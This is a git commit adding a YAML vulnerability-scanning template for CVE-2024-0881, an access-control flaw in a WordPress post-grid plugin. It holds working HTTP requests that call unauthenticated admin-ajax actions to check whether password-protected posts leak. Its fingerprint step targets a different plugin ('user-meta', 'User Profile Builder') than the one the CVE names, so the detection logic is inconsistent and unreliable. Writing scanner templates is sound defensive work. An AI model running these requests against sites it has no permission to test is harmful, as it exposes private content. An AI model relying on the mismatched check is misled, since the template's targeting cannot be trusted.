Merge pull request #9686 from Kazgangap/block

add cve-2024-0881
2024-05-07 18:50:27 +05:30 · 2024-05-07 18:50:27 +05:30 · b21ab65e6e
parent 41f73de8ea 8a91808338
commit b21ab65e6e
1 changed files with 54 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-0881.yaml
+++ b/http/cves/2024/CVE-2024-0881.yaml
@ -0,0 +1,54 @@
+id: CVE-2024-0881
+
+info:
+  name: Combo Blocks < 2.2.76 - Improper Access Control
+  author: Kazgangap
+  severity: medium
+  description: |
+    The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
+  reference:
+    - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-0881
+  classification:
+    cve-id: CVE-2024-0881
+    cwe-id: CWE-284
+    epss-score: 0.00043
+    epss-percentile: 0.08268
+  metadata:
+    verified: true
+    max-request: 3
+    publicwww-query: "/wp-content/plugins/user-meta/"
+  tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt'
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'User Profile Builder'
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '{"html"'
+          - '"<div class='
+          - '"pagination":'
+        condition: and
+
+      - type: status
+        status:
+          - 200